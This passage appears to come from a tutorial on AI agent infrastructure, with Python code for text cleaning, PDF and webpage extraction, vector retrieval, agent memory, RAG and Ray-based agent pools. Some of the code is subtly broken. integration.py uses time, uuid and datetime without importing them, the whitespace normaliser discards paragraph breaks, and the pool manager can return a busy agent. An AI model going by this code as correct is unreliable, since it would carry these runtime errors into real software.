204 self.normalize_whitespace = normalize_whitespace
205 self.strip_markdown = strip_markdown
206
207 def process_document(self, text: str, metadata: Dict[str, Any]) -> List[Tuple[str, Dict[str, Any], str]]:
208 """
209 Process a document for storage in a vector database.
210
211 Args:
212 text: Document text
213 metadata: Document metadata
214
215 Returns:
216 List of (processed_chunk, metadata, id) tuples
217 """
218 # Clean the text
219 cleaned_text = self.clean_text(text)
220
221 # Create a document ID based on content
222 doc_hash = hashlib.md5(cleaned_text.encode()).hexdigest()
223 document_id = metadata.get("id", f"doc_{doc_hash}")
224
225 # Split into chunks with metadata
226 return self.chunker.get_text_chunks_with_metadata(
227 cleaned_text, metadata, document_id
228 )
229
230 def clean_text(self, text: str) -> str:
231 """
232 Clean text by removing unwanted formatting.
233
234 Args:
235 text: Text to clean
236
237 Returns:
238 Cleaned text
239 """
240 if not text:
241 return ""
242
243 # Remove HTML tags
244 if self.clean_html:
245 text = self._remove_html(text)
246
247 # Remove Markdown formatting
248 if self.strip_markdown:
249 text = self._remove_markdown(text)
250
251 # Normalize whitespace
252 if self.normalize_whitespace:
253 text = self._normalize_whitespace(text)
254
255 return text
256
257 def _remove_html(self, text: str) -> str:
258 """
259 Remove HTML tags from text.
260
261 Args:
262 text: Text containing HTML
263
264 Returns:
265 Text with HTML tags removed
266 """
267 # Simple regex-based HTML tag removal
268 text = re.sub(r'<[^>]+>', ' ', text)
269
270 # Replace HTML entities
271 text = re.sub(r'&nbsp;', ' ', text)
272 text = re.sub(r'&lt;', '<', text)
273 text = re.sub(r'&gt;', '>', text)
274 text = re.sub(r'&amp;', '&', text)
275 text = re.sub(r'&quot;', '"', text)
276 text = re.sub(r'&apos;', "'", text)
277
278 return text
279
280 def _remove_markdown(self, text: str) -> str:
281 """
282 Remove Markdown formatting from text.
283
284 Args:
285 text: Text containing Markdown
286
287 Returns:
288 Text with Markdown formatting removed
289 """
290 # Headers
291 text = re.sub(r'^\s*#+\s+', '', text, flags=re.MULTILINE)
292
293 # Bold, italic
294 text = re.sub(r'\*\*(.*?)\*\*', r'\1', text)
295 text = re.sub(r'\*(.*?)\*', r'\1', text)
296 text = re.sub(r'__(.*?)__', r'\1', text)
297 text = re.sub(r'_(.*?)_', r'\1', text)
298
299 # Code blocks
300 text = re.sub(r'```.*?\n(.*?)```', r'\1', text, flags=re.DOTALL)
301 text = re.sub(r'`(.*?)`', r'\1', text)
302
303 # Links
304 text = re.sub(r'\[(.*?)\]\(.*?\)', r'\1', text)
305
306 # Images
307 text = re.sub(r'!\[(.*?)\]\(.*?\)', r'\1', text)
308
309 # Lists
310 text = re.sub(r'^\s*[\*\-+]\s+', '', text, flags=re.MULTILINE)
311 text = re.sub(r'^\s*\d+\.\s+', '', text, flags=re.MULTILINE)
312
313 # Blockquotes
314 text = re.sub(r'^\s*>\s+', '', text, flags=re.MULTILINE)
315
316 return text
317
318 def _normalize_whitespace(self, text: str) -> str:
319 """
320 Normalize whitespace in text.
321
322 Args:
323 text: Text with irregular whitespace
324
325 Returns:
326 Text with normalized whitespace
327 """
328 # Replace multiple whitespace with a single space
329 text = re.sub(r'\s+', ' ', text)
330
331 # Fix line breaks: ensure paragraphs are separated by double newlines
332 text = re.sub(r'\n{3,}', '\n\n', text)
333
334 # Remove leading/trailing whitespace
335 text = text.strip()
336
337 return text
338
339class PDFTextExtractor:
340 """
341 Extracts text from PDF documents for storage in a vector database.
342 """
343
344 def __init__(self, processor: TextProcessor, extract_images: bool = False):
345 """
346 Initialize the PDF text extractor.
347
348 Args:
349 processor: TextProcessor for processing extracted text
350 extract_images: Whether to extract and process images
351 """
352 self.processor = processor
353 self.extract_images = extract_images
354
355 def process_pdf(self,
356 pdf_path: str,
357 metadata: Optional[Dict[str, Any]] = None) -> List[Tuple[str, Dict[str, Any], str]]:
358 """
359 Process a PDF file for storage in a vector database.
360
361 Args:
362 pdf_path: Path to PDF file
363 metadata: Optional metadata to include
364
365 Returns:
366 List of (processed_chunk, metadata, id) tuples
367 """
368 try:
369 import pypdf
370
371 # Extract metadata from PDF
372 pdf_metadata = self._extract_pdf_metadata(pdf_path)
373
374 # Combine with provided metadata
375 if metadata:
376 combined_metadata = {**pdf_metadata, **metadata}
377 else:
378 combined_metadata = pdf_metadata
379
380 # Extract text from PDF
381 text = self._extract_text(pdf_path)
382
383 # Process the extracted text
384 return self.processor.process_document(text, combined_metadata)
385
386 except ImportError:
387 logger.error("PyPDF library not installed. Install with 'pip install pypdf'")
388 raise
389 except Exception as e:
390 logger.error(f"Error processing PDF {pdf_path}: {e}")
391 raise
392
393 def _extract_pdf_metadata(self, pdf_path: str) -> Dict[str, Any]:
394 """
395 Extract metadata from a PDF file.
396
397 Args:
398 pdf_path: Path to PDF file
399
400 Returns:
401 Dictionary of metadata
402 """
403 import pypdf
404
405 with open(pdf_path, 'rb') as f:
406 pdf = pypdf.PdfReader(f)
407 info = pdf.metadata
408
409 # Extract basic metadata
410 metadata = {
411 "source": pdf_path,
412 "file_type": "pdf",
413 "page_count": len(pdf.pages)
414 }
415
416 # Add PDF metadata if available
417 if info:
418 if info.title:
419 metadata["title"] = info.title
420 if info.author:
421 metadata["author"] = info.author
422 if info.subject:
423 metadata["subject"] = info.subject
424 if info.creator:
425 metadata["creator"] = info.creator
426 if info.producer:
427 metadata["producer"] = info.producer
428 if info.creation_date:
429 metadata["creation_date"] = str(info.creation_date)
430
431 return metadata
432
433 def _extract_text(self, pdf_path: str) -> str:
434 """
435 Extract text content from a PDF file.
436
437 Args:
438 pdf_path: Path to PDF file
439
440 Returns:
441 Extracted text
442 """
443 import pypdf
444
445 with open(pdf_path, 'rb') as f:
446 pdf = pypdf.PdfReader(f)
447 text = ""
448
449 # Extract text from each page
450 for page_num, page in enumerate(pdf.pages):
451 page_text = page.extract_text()
452 if page_text:
453 text += f"Page {page_num + 1}:\n{page_text}\n\n"
454
455 # Extract text from images if enabled
456 if self.extract_images:
457 image_text = self._extract_image_text(pdf_path)
458 if image_text:
459 text += f"\nText from images:\n{image_text}\n"
460
461 return text
462
463 def _extract_image_text(self, pdf_path: str) -> str:
464 """
465 Extract text from images in a PDF file using OCR.
466
467 Args:
468 pdf_path: Path to PDF file
469
470 Returns:
471 Extracted text from images
472 """
473 # This would require OCR libraries like pytesseract
474 # Implementation depends on specific requirements
475 # Placeholder implementation
476 return ""
477
478class WebpageTextExtractor:
479 """
480 Extracts text from webpages for storage in a vector database.
481 """
482
483 def __init__(self, processor: TextProcessor):
484 """
485 Initialize the webpage text extractor.
486
487 Args:
488 processor: TextProcessor for processing extracted text
489 """
490 self.processor = processor
491
492 def process_url(self,
493 url: str,
494 metadata: Optional[Dict[str, Any]] = None) -> List[Tuple[str, Dict[str, Any], str]]:
495 """
496 Process a webpage for storage in a vector database.
497
498 Args:
499 url: URL of webpage
500 metadata: Optional metadata to include
501
502 Returns:
503 List of (processed_chunk, metadata, id) tuples
504 """
505 try:
506 import requests
507 from bs4 import BeautifulSoup
508
509 # Fetch webpage
510 response = requests.get(url, headers={
511 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
512 })
513 response.raise_for_status()
514
515 # Parse HTML
516 soup = BeautifulSoup(response.text, 'html.parser')
517
518 # Extract metadata
519 webpage_metadata = self._extract_webpage_metadata(soup, url)
520
521 # Combine with provided metadata
522 if metadata:
523 combined_metadata = {**webpage_metadata, **metadata}
524 else:
525 combined_metadata = webpage_metadata
526
527 # Extract main content
528 content = self._extract_main_content(soup)
529
530 # Process the extracted content
531 return self.processor.process_document(content, combined_metadata)
532
533 except ImportError:
534 logger.error("Required libraries not installed. Install with 'pip install requests beautifulsoup4'")
535 raise
536 except Exception as e:
537 logger.error(f"Error processing URL {url}: {e}")
538 raise
539
540 def _extract_webpage_metadata(self, soup, url: str) -> Dict[str, Any]:
541 """
542 Extract metadata from a webpage.
543
544 Args:
545 soup: BeautifulSoup object
546 url: URL of webpage
547
548 Returns:
549 Dictionary of metadata
550 """
551 metadata = {
552 "source": url,
553 "file_type": "webpage"
554 }
555
556 # Extract title
557 title_tag = soup.find('title')
558 if title_tag:
559 metadata["title"] = title_tag.text.strip()
560
561 # Extract description
562 description_tag = soup.find('meta', attrs={'name': 'description'})
563 if description_tag:
564 metadata["description"] = description_tag.get('content', '')
565
566 # Extract author
567 author_tag = soup.find('meta', attrs={'name': 'author'})
568 if author_tag:
569 metadata["author"] = author_tag.get('content', '')
570
571 # Extract publication date
572 date_tag = soup.find('meta', attrs={'property': 'article:published_time'})
573 if date_tag:
574 metadata["publication_date"] = date_tag.get('content', '')
575
576 # Extract keywords/tags
577 keywords_tag = soup.find('meta', attrs={'name': 'keywords'})
578 if keywords_tag:
579 keywords = keywords_tag.get('content', '')
580 if keywords:
581 metadata["keywords"] = [k.strip() for k in keywords.split(',')]
582
583 return metadata
584
585 def _extract_main_content(self, soup) -> str:
586 """
587 Extract main content from a webpage.
588
589 Args:
590 soup: BeautifulSoup object
591
592 Returns:
593 Extracted text content
594 """
595 # Remove script and style elements
596 for script in soup(["script", "style", "header", "footer", "nav"]):
597 script.extract()
598
599 # Try to find the main content
600 main_content = None
601
602 # Look for common content containers
603 for selector in ['article', 'main', '[role="main"]', '.content', '#content', '.post', '.article']:
604 content_tag = soup.select_one(selector)
605 if content_tag:
606 main_content = content_tag
607 break
608
609 # If no main content container found, use body
610 if not main_content:
611 main_content = soup.body
612
613 # Extract text from content
614 if main_content:
615 # Get all paragraphs
616 paragraphs = main_content.find_all('p')
617 content = '\n\n'.join([p.get_text() for p in paragraphs])
618
619 # If no paragraphs found, use all text
620 if not content:
621 content = main_content.get_text()
622
623 return content
624
625 # Fallback to all text
626 return soup.get_text()

4. Integration with AI Agent System

python
1# vector_storage/integration.py
2import os
3import json
4import logging
5from typing import Dict, List, Any, Optional, Union, Tuple
6
7from .knowledge_base import KnowledgeBase, Document
8from .text_processing import TextProcessor, TextChunker
9
10logger = logging.getLogger(__name__)
11
12class VectorStoreRetriever:
13 """
14 Retriever for fetching relevant information from a knowledge base.
15 """
16
17 def __init__(self,
18 knowledge_base: KnowledgeBase,
19 max_results: int = 5,
20 similarity_threshold: float = 0.7):
21 """
22 Initialize the retriever.
23
24 Args:
25 knowledge_base: Knowledge base to query
26 max_results: Maximum number of results to return
27 similarity_threshold: Minimum similarity threshold
28 """
29 self.knowledge_base = knowledge_base
30 self.max_results = max_results
31 self.similarity_threshold = similarity_threshold
32
33 def retrieve(self,
34 query: str,
35 filter: Optional[Dict[str, Any]] = None,
36 rerank: bool = False) -> List[Document]:
37 """
38 Retrieve relevant documents for a query.
39
40 Args:
41 query: Query string
42 filter: Optional filter for metadata
43 rerank: Whether to rerank results with cross-encoder
44
45 Returns:
46 List of relevant documents
47 """
48 # Search knowledge base
49 documents = self.knowledge_base.search(
50 query=query,
51 top_k=self.max_results * 2 if rerank else self.max_results, # Get more results if reranking
52 threshold=self.similarity_threshold,
53 filter=filter
54 )
55
56 if not documents:
57 logger.info(f"No results found for query: {query}")
58 return []
59
60 # Rerank results if requested
61 if rerank and len(documents) > 0:
62 documents = self._rerank_results(query, documents)
63
64 # Limit to max_results
65 return documents[:self.max_results]
66
67 def _rerank_results(self, query: str, documents: List[Document]) -> List[Document]:
68 """
69 Rerank results using a cross-encoder model.
70
71 Args:
72 query: Original query
73 documents: Initial retrieval results
74
75 Returns:
76 Reranked documents
77 """
78 try:
79 from sentence_transformers import CrossEncoder
80
81 # Initialize cross-encoder
82 model = CrossEncoder('cross-encoder/ms-marco-MiniLM-L-6-v2')
83
84 # Prepare document pairs
85 document_pairs = [(query, doc.content) for doc in documents]
86
87 # Compute similarity scores
88 similarity_scores = model.predict(document_pairs)
89
90 # Update document scores
91 for i, score in enumerate(similarity_scores):
92 documents[i].score = float(score)
93
94 # Sort by new scores
95 documents.sort(key=lambda x: x.score, reverse=True)
96
97 return documents
98
99 except ImportError:
100 logger.warning("sentence-transformers not installed. Install with 'pip install sentence-transformers'")
101 return documents
102 except Exception as e:
103 logger.error(f"Error reranking results: {e}")
104 return documents
105
106 def retrieve_and_format(self,
107 query: str,
108 filter: Optional[Dict[str, Any]] = None,
109 max_tokens: int = 4000) -> str:
110 """
111 Retrieve and format documents as a string, ensuring it fits within token limits.
112
113 Args:
114 query: Query string
115 filter: Optional filter for metadata
116 max_tokens: Maximum tokens to return (approximate)
117
118 Returns:
119 Formatted context string
120 """
121 # Retrieve documents
122 documents = self.retrieve(query, filter)
123
124 if not documents:
125 return "No relevant information found."
126
127 # Format results
128 formatted_text = "Relevant information:\n\n"
129
130 char_count = len(formatted_text)
131 # Rough approximation of tokens to characters (1 token ≈ 4 characters)
132 max_chars = max_tokens * 4
133
134 for i, doc in enumerate(documents):
135 # Format document with score and metadata
136 doc_text = f"[Document {i+1} - Score: {doc.score:.2f}]\n"
137
138 # Add source info if available
139 if "source" in doc.metadata:
140 doc_text += f"Source: {doc.metadata.get('source', 'Unknown')}\n"
141
142 # Add content
143 doc_text += f"\n{doc.content}\n\n{'=' * 40}\n\n"
144
145 # Check if adding this document would exceed the token limit
146 if char_count + len(doc_text) > max_chars:
147 # If this is the first document, add a truncated version
148 if i == 0:
149 chars_remaining = max_chars - char_count
150 if chars_remaining > 100: # Only add if we can include enough meaningful content
151 truncated_content = doc.content[:chars_remaining - 100] + "... [truncated]"
152 doc_text = f"[Document {i+1} - Score: {doc.score:.2f}]\n"
153 if "source" in doc.metadata:
154 doc_text += f"Source: {doc.metadata.get('source', 'Unknown')}\n"
155 doc_text += f"\n{truncated_content}\n\n"
156 formatted_text += doc_text
157 break
158
159 formatted_text += doc_text
160 char_count += len(doc_text)
161
162 return formatted_text
163
164class AgentMemory:
165 """
166 Long-term memory for AI agents using vector storage.
167 """
168
169 def __init__(self,
170 knowledge_base: KnowledgeBase,
171 text_processor: TextProcessor,
172 namespace: str = "agent_memory"):
173 """
174 Initialize agent memory.
175
176 Args:
177 knowledge_base: Knowledge base for storing memories
178 text_processor: Text processor for processing memories
179 namespace: Namespace for this agent's memories
180 """
181 self.knowledge_base = knowledge_base
182 self.text_processor = text_processor
183 self.namespace = namespace
184
185 def add_interaction(self,
186 user_input: str,
187 agent_response: str,
188 metadata: Optional[Dict[str, Any]] = None) -> str:
189 """
190 Add a user-agent interaction to memory.
191
192 Args:
193 user_input: User input text
194 agent_response: Agent response text
195 metadata: Optional additional metadata
196
197 Returns:
198 Memory ID
199 """
200 # Create interaction text
201 interaction_text = f"User: {user_input}\n\nAgent: {agent_response}"
202
203 # Prepare metadata
204 memory_metadata = {
205 "type": "interaction",
206 "timestamp": str(time.time()),
207 "namespace": self.namespace
208 }
209
210 if metadata:
211 memory_metadata.update(metadata)
212
213 # Process the interaction for storage
214 memory_id = f"memory_{str(uuid.uuid4())}"
215
216 # Create a document
217 document = Document(
218 id=memory_id,
219 content=interaction_text,
220 metadata=memory_metadata
221 )
222
223 # Add to knowledge base
224 self.knowledge_base.add_document(document)
225
226 return memory_id
227
228 def add_reflection(self,
229 reflection: str,
230 metadata: Optional[Dict[str, Any]] = None) -> str:
231 """
232 Add an agent reflection to memory.
233
234 Args:
235 reflection: Reflection text
236 metadata: Optional additional metadata
237
238 Returns:
239 Memory ID
240 """
241 # Prepare metadata
242 memory_metadata = {
243 "type": "reflection",
244 "timestamp": str(time.time()),
245 "namespace": self.namespace
246 }
247
248 if metadata:
249 memory_metadata.update(metadata)
250
251 # Process the reflection for storage
252 memory_id = f"reflection_{str(uuid.uuid4())}"
253
254 # Create a document
255 document = Document(
256 id=memory_id,
257 content=reflection,
258 metadata=memory_metadata
259 )
260
261 # Add to knowledge base
262 self.knowledge_base.add_document(document)
263
264 return memory_id
265
266 def search_memory(self,
267 query: str,
268 memory_type: Optional[str] = None,
269 limit: int = 5) -> List[Dict[str, Any]]:
270 """
271 Search agent memory.
272
273 Args:
274 query: Search query
275 memory_type: Optional memory type filter
276 limit: Maximum number of results
277
278 Returns:
279 List of memory entries
280 """
281 # Create filter
282 filter = {"namespace": self.namespace}
283
284 if memory_type:
285 filter["type"] = memory_type
286
287 # Search knowledge base
288 documents = self.knowledge_base.search(
289 query=query,
290 top_k=limit,
291 filter=filter
292 )
293
294 # Format results
295 results = []
296 for doc in documents:
297 results.append({
298 "id": doc.id,
299 "content": doc.content,
300 "type": doc.metadata.get("type", "unknown"),
301 "timestamp": doc.metadata.get("timestamp", ""),
302 "relevance": doc.score
303 })
304
305 return results
306
307 def get_relevant_memories(self,
308 current_input: str,
309 limit: int = 3) -> str:
310 """
311 Get relevant memories for the current user input.
312
313 Args:
314 current_input: Current user input
315 limit: Maximum number of memories to retrieve
316
317 Returns:
318 Formatted string with relevant memories
319 """
320 # Search for relevant memories
321 memories = self.search_memory(current_input, limit=limit)
322
323 if not memories:
324 return ""
325
326 # Format memories
327 formatted_memories = "Relevant past interactions:\n\n"
328
329 for i, memory in enumerate(memories):
330 memory_type = memory.get("type", "interaction").capitalize()
331 timestamp = memory.get("timestamp", "")
332
333 # Try to convert timestamp to human-readable format
334 try:
335 timestamp_float = float(timestamp)
336 timestamp_str = datetime.datetime.fromtimestamp(timestamp_float).strftime("%Y-%m-%d %H:%M:%S")
337 except (ValueError, TypeError):
338 timestamp_str = timestamp
339
340 formatted_memories += f"--- {memory_type} ({timestamp_str}) ---\n"
341 formatted_memories += memory.get("content", "") + "\n\n"
342
343 return formatted_memories
344
345class RAGProcessor:
346 """
347 Retrieval-Augmented Generation (RAG) processor for AI agents.
348 """
349
350 def __init__(self,
351 retriever: VectorStoreRetriever,
352 response_generator: Optional[callable] = None,
353 max_context_tokens: int = 4000):
354 """
355 Initialize the RAG processor.
356
357 Args:
358 retriever: Retriever for fetching relevant information
359 response_generator: Optional function for generating responses
360 max_context_tokens: Maximum tokens for context
361 """
362 self.retriever = retriever
363 self.response_generator = response_generator
364 self.max_context_tokens = max_context_tokens
365
366 def generate_response(self,
367 query: str,
368 filter: Optional[Dict[str, Any]] = None,
369 additional_context: Optional[str] = None,
370 system_prompt: Optional[str] = None) -> Dict[str, Any]:
371 """
372 Generate a response using RAG.
373
374 Args:
375 query: User query
376 filter: Optional filter for knowledge base
377 additional_context: Optional additional context
378 system_prompt: Optional system prompt
379
380 Returns:
381 Dictionary with response and metadata
382 """
383 # Retrieve relevant information
384 retrieved_context = self.retriever.retrieve_and_format(
385 query=query,
386 filter=filter,
387 max_tokens=self.max_context_tokens
388 )
389
390 # Combine with additional context if provided
391 context = retrieved_context
392 if additional_context:
393 context = f"{additional_context}\n\n{context}"
394
395 # Generate response
396 if self.response_generator:
397 # Use provided response generator
398 response = self.response_generator(query, context, system_prompt)
399 else:
400 # Use default OpenAI-based generator
401 response = self._default_response_generator(query, context, system_prompt)
402
403 return {
404 "response": response,
405 "retrieved_context": retrieved_context,
406 "query": query
407 }
408
409 def _default_response_generator(self,
410 query: str,
411 context: str,
412 system_prompt: Optional[str] = None) -> str:
413 """
414 Generate a response using OpenAI.
415
416 Args:
417 query: User query
418 context: Retrieved context
419 system_prompt: Optional system prompt
420
421 Returns:
422 Generated response
423 """
424 import openai
425
426 if not system_prompt:
427 system_prompt = """You are a helpful AI assistant. Use the provided information to answer the user's question.
428 If the information doesn't contain the answer, say you don't know."""
429
430 messages = [
431 {"role": "system", "content": system_prompt},
432 {"role": "user", "content": f"Information:\n{context}\n\nQuestion: {query}"}
433 ]
434
435 response = openai.ChatCompletion.create(
436 model="gpt-4-turbo",
437 messages=messages,
438 temperature=0.5,
439 max_tokens=1000
440 )
441
442 return response.choices[0].message.content

Handling Large-Scale AI Workloads with Distributed Computing

Distributed computing is essential for scaling AI agent systems across multiple machines. Here are key implementation patterns:

1. Ray Distributed Framework Integration

python
1# distributed/ray_integration.py
2import os
3import json
4import time
5import logging
6import ray
7from typing import Dict, List, Any, Optional, Union, Tuple
8
9logger = logging.getLogger(__name__)
10
11# Initialize Ray (will use local Ray cluster if running, otherwise starts one)
12if not ray.is_initialized():
13 ray.init(address=os.environ.get("RAY_ADDRESS", None))
14
15@ray.remote
16class DistributedAgentActor:
17 """Ray actor for running AI agents in a distributed manner."""
18
19 def __init__(self, agent_config: Dict[str, Any]):
20 """
21 Initialize the agent actor.
22
23 Args:
24 agent_config: Configuration for the agent
25 """
26 self.agent_config = agent_config
27 self.agent_type = agent_config.get("agent_type", "general")
28 self.model = agent_config.get("model", "gpt-4-turbo")
29 self.agent_id = f"{self.agent_type}_{time.time()}"
30
31 # Agent state
32 self.conversation_history = []
33 self.metadata = {}
34 self.is_initialized = False
35
36 # Initialize the agent
37 self._initialize_agent()
38
39 def _initialize_agent(self):
40 """Initialize the underlying agent."""
41 try:
42 import autogen
43
44 # Configure the agent based on type
45 system_message = self.agent_config.get("system_message", "You are a helpful assistant.")
46
47 # Create Agent
48 self.agent = autogen.AssistantAgent(
49 name=self.agent_config.get("name", "Assistant"),
50 system_message=system_message,
51 llm_config={
52 "model": self.model,
53 "temperature": self.agent_config.get("temperature", 0.7),
54 "max_tokens": self.agent_config.get("max_tokens", 1000)
55 }
56 )
57
58 # Create UserProxyAgent for handling conversations
59 self.user_proxy = autogen.UserProxyAgent(
60 name="User",
61 human_input_mode="NEVER",
62 max_consecutive_auto_reply=0,
63 code_execution_config=False
64 )
65
66 self.is_initialized = True
67 logger.info(f"Agent {self.agent_id} initialized successfully")
68
69 except Exception as e:
70 logger.error(f"Error initializing agent {self.agent_id}: {e}")
71 self.is_initialized = False
72
73 def generate_response(self, message: str, context: Optional[str] = None) -> Dict[str, Any]:
74 """
75 Generate a response to a message.
76
77 Args:
78 message: User message
79 context: Optional context
80
81 Returns:
82 Response data
83 """
84 if not self.is_initialized:
85 return {"error": "Agent not initialized properly"}
86
87 try:
88 # Prepare the full message with context if provided
89 full_message = message
90 if context:
91 full_message = f"{context}\n\nUser message: {message}"
92
93 # Reset the conversation
94 self.user_proxy.reset()
95
96 # Start the conversation
97 start_time = time.time()
98 self.user_proxy.initiate_chat(
99 self.agent,
100 message=full_message
101 )
102
103 # Extract the response
104 response_content = None
105 for msg in reversed(self.user_proxy.chat_history):
106 if msg["role"] == "assistant":
107 response_content = msg["content"]
108 break
109
110 if not response_content:
111 raise ValueError("No response generated")
112
113 # Calculate processing time
114 processing_time = time.time() - start_time
115
116 # Update conversation history
117 self.conversation_history.append({
118 "role": "user",
119 "content": message,
120 "timestamp": time.time()
121 })
122
123 self.conversation_history.append({
124 "role": "assistant",
125 "content": response_content,
126 "timestamp": time.time()
127 })
128
129 # Prepare response data
130 response_data = {
131 "response": response_content,
132 "agent_id": self.agent_id,
133 "agent_type": self.agent_type,
134 "model": self.model,
135 "processing_time": processing_time
136 }
137
138 return response_data
139
140 except Exception as e:
141 logger.error(f"Error generating response: {e}")
142 return {"error": str(e), "agent_id": self.agent_id}
143
144 def get_conversation_history(self) -> List[Dict[str, Any]]:
145 """
146 Get the conversation history.
147
148 Returns:
149 List of conversation messages
150 """
151 return self.conversation_history
152
153 def set_metadata(self, key: str, value: Any) -> None:
154 """
155 Set metadata for the agent.
156
157 Args:
158 key: Metadata key
159 value: Metadata value
160 """
161 self.metadata[key] = value
162
163 def get_metadata(self, key: Optional[str] = None) -> Any:
164 """
165 Get agent metadata.
166
167 Args:
168 key: Optional specific metadata key
169
170 Returns:
171 Metadata value or all metadata
172 """
173 if key:
174 return self.metadata.get(key)
175 return self.metadata
176
177@ray.remote
178class AgentPoolManager:
179 """Manages a pool of agent actors for efficient resource utilization."""
180
181 def __init__(self,
182 agent_configs: Dict[str, Dict[str, Any]],
183 max_agents_per_type: int = 5,
184 idle_timeout_seconds: int = 300):
185 """
186 Initialize the agent pool manager.
187
188 Args:
189 agent_configs: Dictionary mapping agent types to configurations
190 max_agents_per_type: Maximum number of agents per type
191 idle_timeout_seconds: Seconds of inactivity before removing an agent
192 """
193 self.agent_configs = agent_configs
194 self.max_agents_per_type = max_agents_per_type
195 self.idle_timeout_seconds = idle_timeout_seconds
196
197 # Initialize pools
198 self.agent_pools = {}
199 self.busy_agents = {}
200 self.last_used = {}
201
202 # Create initial agents
203 self._initialize_pools()
204
205 # Start maintenance task
206 self._start_maintenance()
207
208 def _initialize_pools(self):
209 """Initialize agent pools with minimal agents."""
210 for agent_type, config in self.agent_configs.items():
211 self.agent_pools[agent_type] = []
212 self.busy_agents[agent_type] = {}
213
214 # Create one initial agent per type
215 agent_ref = DistributedAgentActor.remote(config)
216 self.agent_pools[agent_type].append(agent_ref)
217 self.last_used[agent_ref] = time.time()
218
219 def _start_maintenance(self):
220 """Start the maintenance task to manage pool size."""
221 import threading
222
223 def maintenance_task():
224 while True:
225 try:
226 self._cleanup_idle_agents()
227 except Exception as e:
228 logger.error(f"Error in maintenance task: {e}")
229
230 time.sleep(60) # Run maintenance every minute
231
232 # Start maintenance thread
233 maintenance_thread = threading.Thread(target=maintenance_task, daemon=True)
234 maintenance_thread.start()
235
236 def _cleanup_idle_agents(self):
237 """Remove idle agents to free resources."""
238 current_time = time.time()
239
240 for agent_type, pool in self.agent_pools.items():
241 # Keep at least one agent per type
242 if len(pool) <= 1:
243 continue
244
245 # Check each agent in the pool
246 for agent_ref in list(pool): # Copy list as we might modify it
247 # Skip if agent is not in last_used (shouldn't happen)
248 if agent_ref not in self.last_used:
249 continue
250
251 # Check if agent has been idle for too long
252 idle_time = current_time - self.last_used[agent_ref]
253 if idle_time > self.idle_timeout_seconds:
254 # Remove from pool
255 pool.remove(agent_ref)
256 del self.last_used[agent_ref]
257
258 # Kill the actor
259 ray.kill(agent_ref)
260
261 logger.info(f"Removed idle agent of type {agent_type} after {idle_time:.1f}s")
262
263 async def get_agent(self, agent_type: str) -> ray.ObjectRef:
264 """
265 Get an agent from the pool.
266
267 Args:
268 agent_type: Type of agent to get
269
270 Returns:
271 Ray object reference to the agent
272
273 Raises:
274 ValueError: If agent type is not configured
275 """
276 if agent_type not in self.agent_configs:
277 raise ValueError(f"Agent type {agent_type} not configured")
278
279 # Check if agent available in pool
280 if not self.agent_pools[agent_type]:
281 # No agents available, create a new one if under limit
282 if len(self.busy_agents[agent_type]) < self.max_agents_per_type:
283 agent_ref = DistributedAgentActor.remote(self.agent_configs[agent_type])
284 self.busy_agents[agent_type][agent_ref] = time.time()
285 self.last_used[agent_ref] = time.time()
286 return agent_ref
287 else:
288 # Wait for an agent to become available
289 # Find least recently used busy agent
290 least_recent_agent, _ = min(
291 self.busy_agents[agent_type].items(),
292 key=lambda x: x[1]
293 )
294 return least_recent_agent
295
296 # Get agent from pool
297 agent_ref = self.agent_pools[agent_type].pop(0)
298 self.busy_agents[agent_type][agent_ref] = time.time()
299 self.last_used[agent_ref] = time.time()
300
301 return agent_ref
302
303 def release_agent(self, agent_ref: ray.ObjectRef, agent_type: str):
304 """
305 Release an agent back to the pool.
306
307 Args:
308 agent_ref: Ray object reference to the agent
309 agent_type: Type of agent
310 """
311 if agent_type not in self.agent_configs:
312 logger.warning(f"Unknown agent type {agent_type} in release_agent")
313 return
314
315 # Remove from busy agents
316 if agent_ref in self.busy_agents[agent_type]:
317 del self.busy_agents[agent_type][agent_ref]
318
319 # Update last used time
320 self.last_used[agent_ref] = time.time()
321
322 # Add back to pool
323 self.agent_pools[agent_type].append(agent_ref)
324
325 def get_pool_status(self) -> Dict[str, Any]:
326 """
327 Get the status of all agent pools.
328
329 Returns:
330 Dictionary with pool status
331 """
332 status = {}
333
334 for agent_type in self.agent_configs:
335 available = len(self.agent_pools.get(agent_type, []))
336 busy = len(self.busy_agents.get(agent_type, {}))
337
338 status[agent_type] = {
339 "available": available,
340 "busy": busy,
341 "total": available + busy,
342 "max": self.max_agents_per_type
343 }
344
345 return status
346
347class RayAgentManager:
348 """High-level manager for distributed AI agents using Ray."""
349
350 def __init__(self, agent_configs_path: str):
351 """
352 Initialize the Ray agent manager.
353
354 Args:
355 agent_configs_path: Path to agent configurations JSON file
356 """
357 # Load agent configurations
358 with open(agent_configs_path, 'r') as f:
359 self.agent_configs = json.load(f)
360
361 # Create agent pool manager
362 self.pool_manager = AgentPoolManager.remote(
363 agent_configs=self.agent_configs,
364 max_agents_per_type=10,
365 idle_timeout_seconds=300
366 )
367
368 async def process_request(self,
369 agent_type: str,
370 message: str,
371 context: Optional[str] = None) -> Dict[str, Any]:
372 """
373 Process a request using a distributed agent.
374
375 Args:
376 agent_type: Type of agent to use
377 message: User message
378 context: Optional context
379
380 Returns:
381 Response data
382 """
383 try:
384 # Get an agent from the pool
385 agent_ref = await self.pool_manager.get_agent.remote(agent_type)
386
387 # Process the request
388 response = await agent_ref.generate_response.remote(message, context)
389
390 # Release the agent back to the pool
391 await self.pool_manager.release_agent.remote(agent_ref, agent_type)
392
393 return response
394
395 except Exception as e:
396 logger.error(f"Error processing request: {e}")
397 return {"error": str(e)}
398
399 async def get_pool_status(self) -> Dict[str, Any]:
400 """
401 Get the status of all agent pools.
402
403 Returns:
404 Dictionary with pool status
405 """
406 return await self.pool_manager.get_pool_status.remote()
407
408@ray.remote
409class BatchProcessingService:
410 """Service for batch processing with AI agents."""
411
412 def __init__(self, agent_manager_ref: ray.ObjectRef):
413 """
414 Initialize the batch processing service.
415
416 Args:
417 agent_manager_ref: Ray object reference to agent pool manager
418 """
419 self.agent_manager = agent_manager_ref
420 self.running_jobs = {}
421
422 async def submit_batch_job(self,
423 items: List[Dict[str, Any]],
424 agent_type: str,
425 max_concurrency: int = 5) -> str:
426 """
427 Submit a batch job for processing.
428
429 Args:
430 items: List of items to process
431 agent_type: Type of agent to use
432 max_concurrency: Maximum concurrent processing
433
434 Returns:
435 Job ID
436 """
437 # Generate a job ID
438 job_id = f"job_{time.time()}_{len(self.running_jobs)}"
439
440 # Start processing in the background
